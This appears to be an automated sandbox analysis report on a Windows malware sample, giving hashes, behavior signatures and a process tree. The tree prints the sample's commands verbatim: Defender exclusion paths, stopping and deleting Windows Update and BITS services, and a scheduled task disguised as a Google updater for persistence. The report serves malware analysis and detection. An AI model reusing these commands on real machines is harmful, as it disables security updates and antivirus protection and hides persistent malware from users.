Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
23/03/2023, 08:05
Static task
static1
Behavioral task
behavioral1
Sample
875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe
Resource
win10v2004-20230220-en
General
-
Target
875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe
-
Size
3.6MB
-
MD5
ce42cbd9b1d81721ae38248d35e9e40a
-
SHA1
1eb087350006f465827227724d7fb040a07a67b2
-
SHA256
875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630
-
SHA512
7162a9e9f680e2547c289362f93db4c18619b8a4f4e5f04ead9faaf561ff2d5612ec46084fca55cbb41a6b446bacfc701946d2dc3b714d629bef98ffc18d2f65
-
SSDEEP
49152:N0YkrpIPrE9C+eSLLbEdswC1dLYOwYRh6a1o0QI+Uu6ff6XOhrMev+:OYkrArE0+eEXuhIdLYOww1o1F6fCwjm
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 1712 created 1244 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 18 PID 1712 created 1244 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 18 PID 1712 created 1244 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 18 PID 1712 created 1244 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 18 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe -
Stops running service(s) 3 TTPs
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\chromeupdater.exe 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 604 sc.exe 1336 sc.exe 1824 sc.exe 1816 sc.exe 1636 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1004 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 920 powershell.exe 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 1712 875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe 1924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 920 powershell.exe Token: SeShutdownPrivilege 1868 powercfg.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeShutdownPrivilege 808 powercfg.exe Token: SeShutdownPrivilege 340 powercfg.exe Token: SeShutdownPrivilege 1812 powercfg.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 932 wrote to memory of 1824 932 cmd.exe 35 PID 932 wrote to memory of 1824 932 cmd.exe 35 PID 932 wrote to memory of 1824 932 cmd.exe 35 PID 1096 wrote to memory of 1868 1096 cmd.exe 36 PID 1096 wrote to memory of 1868 1096 cmd.exe 36 PID 1096 wrote to memory of 1868 1096 cmd.exe 36 PID 932 wrote to memory of 1816 932 cmd.exe 37 PID 932 wrote to memory of 1816 932 cmd.exe 37 PID 932 wrote to memory of 1816 932 cmd.exe 37 PID 1096 wrote to memory of 808 1096 cmd.exe 38 PID 1096 wrote to memory of 808 1096 cmd.exe 38 PID 1096 wrote to memory of 808 1096 cmd.exe 38 PID 932 wrote to memory of 1636 932 cmd.exe 39 PID 932 wrote to memory of 1636 932 cmd.exe 39 PID 932 wrote to memory of 1636 932 cmd.exe 39 PID 1096 wrote to memory of 340 1096 cmd.exe 42 PID 1096 wrote to memory of 340 1096 cmd.exe 42 PID 1096 wrote to memory of 340 1096 cmd.exe 42 PID 932 wrote to memory of 604 932 cmd.exe 41 PID 932 wrote to memory of 604 932 cmd.exe 41 PID 932 wrote to memory of 604 932 cmd.exe 41 PID 1096 wrote to memory of 1812 1096 cmd.exe 40 PID 1096 wrote to memory of 1812 1096 cmd.exe 40 PID 1096 wrote to memory of 1812 1096 cmd.exe 40 PID 932 wrote to memory of 1336 932 cmd.exe 43 PID 932 wrote to memory of 1336 932 cmd.exe 43 PID 932 wrote to memory of 1336 932 cmd.exe 43 PID 932 wrote to memory of 972 932 cmd.exe 44 PID 932 wrote to memory of 972 932 cmd.exe 44 PID 932 wrote to memory of 972 932 cmd.exe 44 PID 932 wrote to memory of 1084 932 cmd.exe 45 PID 932 wrote to memory of 1084 932 cmd.exe 45 PID 932 wrote to memory of 1084 932 cmd.exe 45 PID 932 wrote to memory of 1528 932 cmd.exe 46 PID 932 wrote to memory of 1528 932 cmd.exe 46 PID 932 wrote to memory of 1528 932 cmd.exe 46 PID 932 wrote to memory of 1072 932 cmd.exe 47 PID 932 wrote to memory of 1072 932 cmd.exe 47 PID 932 wrote to memory of 1072 932 cmd.exe 47 PID 1924 wrote to memory of 1004 1924 powershell.exe 48 PID 1924 wrote to memory of 1004 1924 powershell.exe 48 PID 1924 wrote to memory of 1004 1924 powershell.exe 48 PID 932 wrote to memory of 1864 932 cmd.exe 49 PID 932 wrote to memory of 1864 932 cmd.exe 49 PID 932 wrote to memory of 1864 932 cmd.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1244
-
C:\Users\Admin\AppData\Local\Temp\875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe"C:\Users\Admin\AppData\Local\Temp\875b176bbb3a6308925f4fa4621fac891c244d2e510b15049f4950255ba7f630.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:340
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1824
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1636
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:604
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1336
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:972
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1084
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1528
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1072
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1864
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#dzxmaohun#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineUA /tr "'C:\Program Files\Google\Chrome\chromeupdater.exe'"3⤵
- Creates scheduled task(s)
PID:1004
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4DYFE9F06FC8K67YEIDT.temp
Filesize7KB
MD50afac6571b3b0c90dc8e716ce99da328
SHA1a6ae57d4daaed4d8627234ecb497798e7db00912
SHA256dcfcae1f642d254dab75d52c6c6e110f0e12652978d9729ec8170c3dc29585e5
SHA512f529cae51bc4c1407bac6af3c03b05c88cb417dcbab06ee5bbbc205e98f21de8a36bf7d6fbb3dcb7ec9bf06192251c4eabd36846c4761fb44354ac5016042729
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50afac6571b3b0c90dc8e716ce99da328
SHA1a6ae57d4daaed4d8627234ecb497798e7db00912
SHA256dcfcae1f642d254dab75d52c6c6e110f0e12652978d9729ec8170c3dc29585e5
SHA512f529cae51bc4c1407bac6af3c03b05c88cb417dcbab06ee5bbbc205e98f21de8a36bf7d6fbb3dcb7ec9bf06192251c4eabd36846c4761fb44354ac5016042729